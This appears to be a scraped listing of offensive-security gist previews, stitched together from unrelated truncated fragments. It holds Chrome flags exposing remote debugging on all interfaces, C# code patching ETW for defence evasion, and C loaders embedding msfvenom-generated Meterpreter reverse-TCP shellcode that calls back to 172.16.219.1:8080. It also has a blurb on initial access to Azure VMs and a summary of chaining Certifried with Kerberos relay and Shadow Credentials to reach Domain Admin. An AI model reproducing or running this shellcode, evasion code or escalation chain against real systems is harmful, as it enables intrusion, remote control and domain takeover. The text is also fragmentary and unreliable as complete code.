Start Chrome with the following flags:
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
--remote-debugging-port=9222
--remote-debugging-address=0.0.0.0
| using System; | |
| using System.Diagnostics; | |
| using System.Linq; | |
| using System.Runtime.InteropServices; | |
| using DInvoke.DynamicInvoke; | |
| namespace PatchETW | |
| { | |
| public static class Native | |
| { |
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| namespace BlockDllTest | |
| { | |
| class Program | |
| { | |
| static void Main(string[] args) | |
| { |
| D_SEC( A ) NTSTATUS NTAPI Entry( _In_ PVOID Parameter ) | |
| { | |
| PARSED_BUF Psr; | |
| UINT32 Wrt = 0; | |
| PARG Arg = NULL; | |
| LPWSTR Nps = NULL; | |
| HANDLE Pip = NULL; |
| #include <windows.h> | |
| #include <stdio.h> | |
| extern WORD WINAPI RtlRunOnceExecuteOnce(RTL_RUN_ONCE *once, PRTL_RUN_ONCE_INIT_FN func, void *param, void **context); | |
| typedef ULONG (WINAPI* RTL_RUN_ONCE_INIT_FN)(_Inout_ PRTL_RUN_ONCE RunOnce, _Inout_opt_ PVOID Parameter, _Inout_opt_ PVOID *Context); | |
| // msfvenom LPORT=8080 LHOST=172.16.219.1 -p windows/x64/meterpreter/reverse_tcp -f c | |
| unsigned char shellcode_bin[] = | |
| "\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50" | |
| "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52" |
| #include <windows.h> | |
| #include <stdio.h> | |
| extern WORD WINAPI RtlRunOnceExecuteOnce(RTL_RUN_ONCE *once, PRTL_RUN_ONCE_INIT_FN func, void *param, void **context); | |
| typedef ULONG (WINAPI* RTL_RUN_ONCE_INIT_FN)(_Inout_ PRTL_RUN_ONCE RunOnce, _Inout_opt_ PVOID Parameter, _Inout_opt_ PVOID *Context); | |
| // msfvenom LPORT=8080 LHOST=172.16.219.1 -p windows/x64/meterpreter/reverse_tcp -f c | |
| unsigned char shellcode_bin[] = | |
| "\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50" | |
| "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52" |
| <div id="plugin-header" class="profile-heading-container"> | |
| <div class="body"> | |
| <strong class="profile-heading">Initial access on Azure resources</strong> | |
| <p> | |
| Use Operator to get initial access on your Azure-deployed resources. This will allow you to deploy Pneuma (or PneumaEX for professional license holders) onto | |
| virtual machines running in Resource Groups on Microsoft Azure. | |
| </p> | |
| </div> | |
| </div> |
Certifried (CVE-2022-26923) gives Domain Admin from a non-privileged user, with the requirement of adding computer accounts or owning a computer account. Kerberos Relay targeting LDAP and Shadow Credentials give a non-privileged domain user on a domain-joined machine local admin access to (i.e., ownership of) that machine. Combining these two: a non-privileged domain user escalating to Domain Admin without the requirement of adding/owning computer accounts.
The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.
Prerequisites:
| #!/usr/bin/env python | |
| import sys | |
| import os.path | |
| if __name__ == "__main__": | |
| if len(sys.argv) != 2: | |
| print("usage: {} names.txt".format((sys.argv[0]))) | |
| sys.exit(0) | |
| if not os.path.exists(sys.argv[1]): |